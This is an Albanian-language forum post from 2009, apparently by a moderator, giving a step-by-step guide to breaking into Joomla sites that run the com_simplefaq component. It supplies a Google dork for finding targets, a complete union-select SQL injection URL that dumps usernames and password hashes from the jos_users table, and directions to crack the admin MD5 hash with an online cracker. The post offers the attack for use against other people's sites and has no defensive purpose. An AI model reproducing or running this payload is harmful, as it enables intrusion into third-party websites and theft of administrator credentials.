Hacko Joomla weba me SQL exploit shum leht

  Share
  avatar
  Smart-Dragon
  Moderator
  Moderator

  Postimet : 93
  Pikët : 157
  Thanks : 1
  Join date : 26/05/2009

  (N) Hacko Joomla weba me SQL exploit shum leht

  Mesazh nga Smart-Dragon prej Sun May 31, 2009 1:16 pm

  Hacko Joomla weba me SQL exploit shum leht

  vetem hyni ne google dhe shenoni ket inurl:"/index.php?option=com_simplefaq "pastaj dalin plot weba hini ne ndonjeren dhe fshijani krejt qka ka mbas sej deri tek
  webi.com/pastaj mbas ksej shtojeni kete
  index.php?option=com_simplefaq &task=answer&Itemid=9999&catid =9999&aid=-1/**/union/**/select/**/0,username,password,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/jos_users/*
  dhe ateher e gjeni userin e adminit dhe md5 pastaj shkoni ne
  http://www.milw0rm.com/cracker/info.php
  at kodin e madh qiteni aty dhe klikoni Submit dhe do tju del pasi i ati userit

  klm

   Ora është Mon Apr 23, 2018 1:42 am